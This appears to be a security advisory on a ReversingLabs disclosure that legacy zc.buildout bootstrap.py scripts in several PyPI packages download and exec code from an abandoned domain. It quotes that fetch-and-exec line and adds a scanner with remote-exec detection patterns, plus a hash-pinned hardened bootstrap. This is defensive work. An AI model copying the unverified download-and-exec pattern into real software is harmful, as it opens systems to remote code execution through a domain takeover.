Legacy Python Scripts Create Dormant Supply Chain Risk via Abandoned Domain

ReversingLabs Uncovers Latent Domain-Takeover Risk in PyPI Packages Using Legacy 'zc.buildout' Scripts

Severity: HIGH
November 28, 2025
Categories: Supply Chain Attack, Vulnerability, Security Operations

Related Entities

Products & Tech

PyPI, zc.buildout, Setuptools, Python

Full Report

Executive Summary

On November 28, 2025, ReversingLabs disclosed a latent but significant supply chain vulnerability in the Python Package Index (PyPI) ecosystem. The vulnerability stems from legacy bootstrap scripts (bootstrap.py) associated with the zc.buildout deployment tool. These scripts, still present in some active Python packages, contain a hardcoded instruction to download and execute code from python-distribute[.]org. This domain, associated with the long-defunct 'Distribute' project, has been abandoned and is available for purchase. A threat actor could register this domain to serve malware, which would then be executed by any system running the vulnerable script. This presents a classic domain-takeover attack scenario, posing a silent, long-term risk to legacy software projects.


Vulnerability Details

The vulnerability is not in the Python language or PyPI itself, but in the code of specific packages that bundle an old version of the bootstrap.py script from zc.buildout. This script was designed to set up a build environment and contains the following dangerous lines of code:

    # Python 2 syntax (urllib2 module, exec as a statement). The HTTP response body
    # is handed straight to the interpreter; nothing is verified first.
    import urllib2

    exec urllib2.urlopen('http://python-distribute.org/distribute_setup.py').read()

This code fetches a Python script over cleartext HTTP from python-distribute[.]org and passes the response body straight to exec, so whatever the server returns runs with the privileges of the user who invoked the bootstrap. 'Distribute' was a fork of setuptools maintained until 2013, when its changes were merged back into setuptools 0.7; the project was retired and its domain subsequently lapsed.

An attacker who registers python-distribute[.]org would have full control over the code executed by these bootstrap scripts. While the script is not triggered by a standard pip install, it can be run manually by developers or, more dangerously, by legacy automated build systems that still rely on zc.buildout.

Affected Systems

ReversingLabs identified several PyPI packages that include the vulnerable script, such as:

  • tornado
  • pypiserver
  • slapos.core
  • roman
  • xlutils
  • testfixtures

The full extent of the exposure is unknown, as many more private or older projects may contain the script.


Technical Analysis

This vulnerability enables a straightforward yet powerful attack.

  • T1195.002 - Compromise Software Supply Chain: By taking over a domain referenced in a build tool, an attacker can poison the software supply chain for any project that uses it.
  • T1189 - Drive-by Compromise: While not a traditional drive-by download from a website, the mechanism is similar: a user performs a seemingly legitimate action (running a bootstrap script) that results in the silent execution of malicious code from a controlled resource.
  • T1105 - Ingress Tool Transfer: The vulnerable script acts as a downloader, pulling the attacker's payload into the target environment.
  • T1059.006 - Python: The downloaded payload would be a Python script, executed by the Python interpreter.

Serving the script over http:// rather than https:// widens the attack surface further. Because the request is cleartext, any on-path attacker (a compromised network segment, a rogue proxy, a hostile Wi-Fi gateway) can substitute their own response without owning the domain and without any certificate. HTTPS alone would not close the domain-takeover path, however: whoever registers python-distribute[.]org can obtain a valid TLS certificate for it from a public CA, so the only robust fixes are to pin the payload's hash or, preferably, to remove the remote download altogether.


Impact Assessment

The potential impact is high. If a threat actor were to purchase the domain, they could silently inject ransomware, spyware, or a persistent backdoor into countless development and production environments. The attack would be difficult to trace, as the initial infection vector is a trusted, albeit legacy, build script. Legacy systems in large enterprises, which are often slow to update, are at the highest risk. A successful compromise could lead to intellectual property theft, production outages, or further supply chain attacks originating from the compromised build environment.


IOCs

Type            Value                                              Description
domain          python-distribute.org                              The abandoned domain that can be registered by an attacker.
file_name       bootstrap.py                                       The name of the vulnerable script from zc.buildout.
string_pattern  http://python-distribute.org/distribute_setup.py   The specific string to search for in codebases to identify vulnerable scripts.

Detection & Response

  1. Code Scanning: Organizations should perform static analysis (SAST) of their entire codebase, including vendor and open-source dependencies, to search for the string python-distribute.org. This is a direct application of D3FEND's File Content Rules.
  2. DNS/Network Monitoring: Monitor DNS queries and outbound network traffic for any requests to python-distribute.org. Any connection attempt to this domain should be treated as a high-priority security alert. This aligns with D3FEND's DNS Denylisting.
  3. Dependency Analysis: Use Software Composition Analysis (SCA) tools to identify projects that depend on zc.buildout or on packages known to bundle the vulnerable script. Note that SCA keyed on declared dependencies will not see a bootstrap.py that was copied into a repository by hand, so pair it with the content scan in step 1.

Response: If a vulnerable script is found, remove it or update it immediately. If network traffic to python-distribute.org is detected, isolate the affected system and analyze it forensically: the request itself shows that the bootstrap script was executed, and the host would have run whatever the domain's current holder served.
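As an added example (not ReversingLabs' tooling and not zc.buildout code), the following Python script implements the code-scanning step above and goes slightly beyond the exact IOC: besides the domain and URL strings it flags any exec that feeds a urlopen(...).read() result straight to the interpreter, which is how the same bug survives a port to Python 3 or a change of host. The sample tree it scans is constructed inline, and the mirror hostname in it is hypothetical.

```python
"""Content scan for the zc.buildout bootstrap.py remote-exec pattern.

Added example (not ReversingLabs' scanner or zc.buildout code). Flags the exact
IOC from the report and, more generally, any exec of a urlopen(...).read()
result, which is the same bug after a port to Python 3 or a change of host."""
import os
import re
import tempfile
from dataclasses import dataclass

IOC_DOMAIN = "python-distribute.org"

# Exact IOC from the report, scheme-agnostic so an https:// variant is not missed.
IOC_URL_RE = re.compile(r"https?://python-distribute\.org/distribute_setup\.py")

# Generalised rule: `exec urllib2.urlopen(...).read()` (Python 2 statement) or
# `exec(urlopen(...).read())` (Python 3 call), whatever the host.
REMOTE_EXEC_RE = re.compile(r"\bexec\b[\s(]*[\w.]*urlopen\(.*?\)\.read\(\)")

# bootstrap.py is the known carrier, but buildout.cfg, MANIFEST.in and shell
# wrappers can reference the same URL, so scan those too.
SOURCE_SUFFIXES = (".py", ".cfg", ".in", ".txt", ".sh")


@dataclass
class Finding:
    path: str
    line_no: int
    rule: str      # "ioc-url", "ioc-domain" or "remote-exec"
    line: str


def scan_text(path: str, text: str) -> list[Finding]:
    """Apply the rules line by line, most specific first."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if IOC_URL_RE.search(line):
            rule = "ioc-url"
        elif IOC_DOMAIN in line:
            rule = "ioc-domain"
        elif REMOTE_EXEC_RE.search(line):
            rule = "remote-exec"
        else:
            continue
        findings.append(Finding(path, n, rule, line.strip()))
    return findings


def scan_tree(root: str) -> list[Finding]:
    """Walk a checkout (vendored dependencies included) and collect findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(SOURCE_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_text(path, fh.read()))
            except OSError:
                continue  # unreadable file; a real scanner would log this
    return findings


# Constructed sample tree (not real package contents) so the scan runs offline.
SAMPLES = {
    "legacy/bootstrap.py": (
        "import urllib2\n"
        "exec urllib2.urlopen('http://python-distribute.org/distribute_setup.py').read()\n"
    ),
    "legacy/buildout.cfg": "[buildout]\nfind-links = http://python-distribute.org/\n",
    "ported/bootstrap.py": (
        "from urllib.request import urlopen\n"
        "exec(urlopen('https://mirror.example.invalid/distribute_setup.py').read())\n"
    ),
    "app/clean.py": (
        "from urllib.request import urlopen\n"
        "def fetch(url):\n"
        "    return urlopen(url).read()  # downloaded, never passed to exec\n"
    ),
}


def demo() -> list[tuple[str, str]]:
    """Write the samples to a temp dir, scan it, return (relative path, rule) pairs."""
    with tempfile.TemporaryDirectory() as root:
        for rel, text in SAMPLES.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(text)
        return sorted(
            (os.path.relpath(f.path, root).replace(os.sep, "/"), f.rule)
            for f in scan_tree(root)
        )


if __name__ == "__main__":
    for rel, rule in demo():
        print(f"{rule:12s} {rel}")
```

Run against a real checkout, scan_tree(root) is the entry point; the "remote-exec" rule is the one worth keeping in CI after the known IOC has been cleaned out, since it catches the next copy of the same mistake regardless of which domain it points at.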


Mitigation

  1. Code Sanitization: The primary mitigation is to find and remove every instance of the vulnerable bootstrap.py script from all projects. Replace the legacy bootstrap with a pinned, reproducible install: pip with a pinned requirements file inside a virtual environment, or a pyproject.toml-based build.
  2. Defensive Domain Registration: A security organization or the Python Software Foundation could proactively register python-distribute.org and either sinkhole it or point it at a warning page, neutralizing the threat for everyone.
  3. Outbound Traffic Filtering: Block all network traffic to python-distribute.org at the firewall or proxy level. This is a simple but effective compensating control. See D3FEND's Outbound Traffic Filtering.
  4. Update Build Processes: Migrate any remaining legacy projects that use zc.buildout to modern, secure build and dependency management systems.
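Deleting the script is the right fix. Where a download-and-execute bootstrap genuinely cannot be removed yet, the following added example (not zc.buildout's code and not part of the ReversingLabs report) shows the hardened form beside the failure modes the page describes: the URL must be https://, the payload must match a SHA-256 digest recorded when the script was vetted, and anything else fails closed before exec runs. The fetch function is injected so the example runs offline; the mirror URL and payloads are constructed, and a real script would pass urllib.request.urlopen in their place.

```python
"""Hardened form of a download-and-exec bootstrap: HTTPS only, pinned SHA-256,
fail closed. Added example; not zc.buildout's code. `fetch` is injected so the
example runs offline against constructed payloads; a real script would pass
e.g. `lambda u: urllib.request.urlopen(u, timeout=30).read()`."""
import hashlib
import hmac
from typing import Callable

Fetcher = Callable[[str], bytes]


class BootstrapVerificationError(RuntimeError):
    """Raised when the bootstrap payload cannot be trusted; nothing is executed."""


def fetch_verified(url: str, expected_sha256: str, fetch: Fetcher) -> bytes:
    """Return the payload only if it came over HTTPS and matches the pinned digest."""
    if not url.lower().startswith("https://"):
        # Cleartext HTTP lets any on-path attacker substitute the payload;
        # refuse before a single byte is requested.
        raise BootstrapVerificationError(f"refusing non-HTTPS bootstrap URL: {url}")
    payload = fetch(url)
    actual = hashlib.sha256(payload).hexdigest()
    # Pinning the digest means even a new owner of the legitimate domain (with a
    # perfectly valid certificate) cannot change what runs. compare_digest
    # avoids a timing side channel on the comparison.
    if not hmac.compare_digest(actual, expected_sha256.lower()):
        raise BootstrapVerificationError(
            f"sha256 mismatch for {url}: got {actual}, expected {expected_sha256}")
    return payload


def run_bootstrap(url: str, expected_sha256: str, fetch: Fetcher) -> dict:
    """Execute a verified payload in its own namespace and return that namespace."""
    code = fetch_verified(url, expected_sha256, fetch)
    namespace: dict = {"__name__": "bootstrap"}
    exec(compile(code, url, "exec"), namespace)
    return namespace


# --- Constructed demo data: hypothetical mirror URL and payloads, not real ones ---
TRUSTED_URL = "https://mirror.example.invalid/distribute_setup.py"
TRUSTED_PAYLOAD = b"MARKER = 'trusted bootstrap'\n"
# In practice the digest is recorded out of band when the script is reviewed,
# not computed from whatever the server happens to serve today.
TRUSTED_SHA256 = hashlib.sha256(TRUSTED_PAYLOAD).hexdigest()
TAMPERED_PAYLOAD = b"MARKER = 'attacker-controlled'\n"


def fetch_trusted(url: str) -> bytes:
    return TRUSTED_PAYLOAD


def fetch_tampered(url: str) -> bytes:
    return TAMPERED_PAYLOAD  # what a taken-over or spoofed host would return


def demo_good() -> str:
    """Unmodified payload over HTTPS with the right digest: it runs."""
    return run_bootstrap(TRUSTED_URL, TRUSTED_SHA256, fetch_trusted)["MARKER"]


def demo_tampered() -> bool:
    """True when a swapped payload is rejected before execution."""
    try:
        run_bootstrap(TRUSTED_URL, TRUSTED_SHA256, fetch_tampered)
    except BootstrapVerificationError:
        return True
    return False


def demo_cleartext() -> bool:
    """True when the original http:// URL is refused before any fetch happens."""
    calls: list[str] = []

    def spy(url: str) -> bytes:
        calls.append(url)
        return TRUSTED_PAYLOAD

    try:
        run_bootstrap("http://python-distribute.org/distribute_setup.py",
                      TRUSTED_SHA256, spy)
    except BootstrapVerificationError:
        return calls == []
    return False


if __name__ == "__main__":
    print(demo_good(), demo_tampered(), demo_cleartext())
```

The pinned digest is the part that actually defeats a domain takeover; the HTTPS check only removes the on-path substitution that cleartext HTTP allows. Updating the bootstrap then means reviewing the new script and committing its new digest, which is the same discipline a lock file imposes and a good argument for moving to one.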

Timeline of Events

  1. November 28, 2025: ReversingLabs publishes its disclosure; this article is published.

MITRE ATT&CK Mitigations

Update Software (M1051)

Migrating from the legacy zc.buildout tool to modern build systems is a form of software update that removes the vulnerability.

Mapped D3FEND Techniques: Software Update

Filter Network Traffic (M1037)

Blocking the abandoned domain at the network perimeter is an effective compensating control.

Mapped D3FEND Techniques: DNS Denylisting, Outbound Traffic Filtering

Audit (M1047)

Auditing codebases for references to the insecure, abandoned domain allows organizations to identify their exposure.

Mapped D3FEND Techniques: File Content Rules
D3FEND Defensive Countermeasures

File Content Rules

Run a continuous content scan across all source repositories, including legacy and archived ones, for the string python-distribute.org and for the bootstrap.py download-and-exec pattern. A grep step in the CI/CD pipeline is enough to start; a SAST rule gives the same coverage with less noise. Any match should raise a high-priority alert to the security and development teams so the script is removed before it is ever executed, which neutralizes the threat at its source.

DNS Denylisting and Outbound Traffic Filtering

Add python-distribute.org to the denylist on all corporate DNS resolvers and web proxies. This compensating control stops any internal system, developer workstation and build server alike, from resolving or reaching the domain even if a vulnerable script is run, breaking the attack chain at the download step. Apply it network-wide rather than per host, since it also protects assets that have not yet been scanned.

Software Update

Identify and migrate every application that still relies on zc.buildout to a supported Python build and dependency toolchain (pip with a pinned requirements file, or a pyproject.toml-based build). Removing bootstrap.py is the tactical fix; retiring the legacy build process removes the root cause along with the other risks that come with unmaintained tooling. Prioritize production systems and anything that feeds a downstream software supply chain.

Sources & References

  • "Legacy Python Bugs Enable PyPI Attacks via Domain Hijack", First Hackers News (firsthackers.com), November 28, 2025.

Article Author

Jason Gomes


• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & Analysis, Security Orchestration (SOAR/XSOAR), Incident Response & Digital Forensics, Security Operations Center (SOC), SIEM & Security Analytics, Cyber Fusion & Threat Sharing, Security Automation & Integration, Managed Detection & Response (MDR)

Tags

Python, PyPI, Supply Chain Attack, Domain Takeover, ReversingLabs, zc.buildout
